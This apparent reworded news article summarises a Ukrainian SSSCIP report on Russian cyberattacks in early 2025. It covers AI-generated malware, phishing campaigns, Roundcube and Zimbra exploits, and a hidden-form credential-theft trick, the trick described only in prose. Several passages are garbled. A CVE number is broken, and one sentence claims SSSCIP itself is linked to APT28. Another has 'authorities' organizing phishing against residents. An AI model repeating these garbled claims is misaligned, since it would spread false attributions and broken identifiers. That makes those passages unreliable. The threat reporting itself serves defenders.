
The introduction of artificial intelligence (AI) in cyberattacks on Ukraine by Russian hackers has reached a new level in the first half of 2025 (H1 2025), the country’s State Special Communications and Information Protection Service (SSSCIP) has announced.
“Hackers are now using this to do more than just generate phishing messages. Some of the malware samples we analyzed showed clear signs of being generated by AI, and attackers definitely don’t intend to stop there,” the agency said in a report released Wednesday.
According to SSSCIP, 3,018 cyber incidents were recorded during the same period, up from 2,575 in the second half of 2024 (H2 2024). Compared to the second half of 2024, attacks against local governments and military organizations increased, while attacks targeting governments and the energy sector decreased.
One notable attack observed was when UAC-0219 used malware called WRECKSTEEL in attacks against state government offices and critical infrastructure facilities in the country. There is evidence to suggest that PowerShell data stealing malware was developed using AI tools.

Some of the other campaigns registered against Ukraine are listed below.
A phishing campaign organized by UAC-0218 targeting the Armed Forces to distribute HOMESTEEL using booby-trapped RAR archives A phishing campaign organized by UAC-0226 targeting organizations involved in the development of innovations in the defense industry sector, local governments, military units, and law enforcement agencies with the aim of distributing a stealer called GIFTEDCROOK UAC-0227 Phishing campaigns targeting local residents, organized by authorities, critical infrastructure facilities, Regional Recruitment and Social Support Centers (TRC and SSC). A phishing campaign organized by UAC-0125, a subcluster associated with Sandworm, that sent email messages containing links to websites masquerading as ESET. Delivering a C#-based backdoor named Kalambur (also known as SUMBUR) under the guise of a threat removal program.
SSSCIP has been linked to Russian-linked APT28 (aka UAC-0001) attackers using Roundcube (CVE-2023-43770, CVE-2024-37383, CVE-202) 5-49113) and Zimbra (CVE-2024-27443, CVE-2025-27915). Webmail software that performs zero-click attacks.
“When exploiting such vulnerabilities, an attacker typically injects malicious code through the Roundcube or Zimbra API to gain access to credentials, contact lists, and filters configured to forward all email to an attacker-controlled mailbox,” SSSCIP said.

“Another way to steal credentials using these vulnerabilities was to create a hidden HTML block (visibility: hidden) with login and password input fields with the attribute autocomplete=”on” set. This allowed the fields to be autofilled with data stored in the browser, which was then exposed.
The agency also revealed that Russia continues to engage in hybrid warfare, synchronizing battlefield kinetic attacks and cyber operations with the Sandworm (UAC-0002) group targeting organizations in the energy, defense, internet service providers, and research sectors.
Additionally, several threat groups targeting Ukraine are exploiting legitimate services such as Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, Telegra.ph, Teletype.in, Firebase, ipfs.io, and mocky.io to host malware and phishing pages or turn them into data exfiltration channels.
“Using legitimate online resources for malicious purposes is not a new tactic,” SSSCIP said. “However, the number of such platforms exploited by Russian hackers has been steadily increasing recently.”
Source link